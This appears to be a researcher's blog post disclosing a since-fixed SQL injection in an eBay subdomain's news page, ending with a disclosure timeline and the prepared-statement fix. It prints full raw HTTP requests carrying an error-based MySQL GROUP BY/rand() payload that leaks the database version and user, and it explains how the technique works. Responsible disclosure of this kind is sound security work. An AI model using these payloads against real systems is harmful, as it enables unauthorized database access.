During my latest bug hunting on subdomains of eBay I found an exploitable SQL injection, which I promptly reported to eBay's security team. After my initial contact it took 20 days until they finally fixed the SQL injection issue. eBay sent me a high-end computer mouse with cool features as a gift for my responsible and coordinated disclosure.

The vulnerable page was located at http://sea.ebay.com/news.php and the “checkbox” array POST parameter was prone to SQL injection. During the research I found that every time I put an SQL expression into that parameter, the page showed a generic SQL error message saying that the syntax was wrong. For example, when I supplied:

Enforcing an error message - @@secalert
...
POST /news.php?time=3&catid=31 HTTP/1.1
...
checkbox%5B%5D=(select @@secalert)

the web server responded with the message “Unknown system variable 'secalert'”. That text is a MySQL server error, not an application message: the injected @@secalert was parsed as a reference to a server system variable, which shows that the user-supplied value is placed unescaped into the legitimate SQL query.

But when I supplied syntactically correct SQL, I got no results back from the web server, so there was no direct channel for query output. The way around this is a nested SELECT that is syntactically valid but fails at runtime with an error whose text carries the data I am after. The payload below uses the well-known MySQL GROUP BY trick: the inner SELECT groups the two rows of (select 1 union select 2) by a column built from the target expression concatenated with floor(rand()*2); because rand() is re-evaluated while the grouping table is filled, the key can collide and MySQL aborts with a “Duplicate entry ... for key 'group_key'” error that echoes the key, and with it the value of @@VERSION. The CHAR() calls are just markers, CHAR(68) is “D” and CHAR(65),CHAR(86),CHAR(73),CHAR(68) spell “AVID”, so the leaked value is easy to spot in the error text. Note that with an unseeded rand() over only two rows the collision is not guaranteed on every request, so the same request may have to be sent more than once. So here we go in the next step:

SQL injection PoC 1 - @@version
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

This time I got a valid response with the following message. I have marked the interesting part, which shows the version of the DBMS in use.

To verify that it is really exploitable, I decided to make a second request asking for the current DBMS user.

SQL Injection PoC 2 - user()
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&

This time the web server response contained the name of the current DBMS user, as you can see in the following screenshot.

Finally, eBay mitigated this issue by using prepared statements, so that user-supplied values are passed to the database as bound parameters and can no longer become part of the SQL query text.

Timeline
October 30th, 2012: Vulnerability found and reported to eBay (securityresearch@ebay.com)
November 5th, 2012: Vulnerability reported to eBay once again
November 5th, 2012: eBay confirms the presence of the SQL injection
November 16th, 2012: eBay replied that the SQL injection is now fixed and they want to send me a little gift
November 18th, 2012: I published this blog post
December 15th, 2012: I received an optical computer mouse from the eBay security team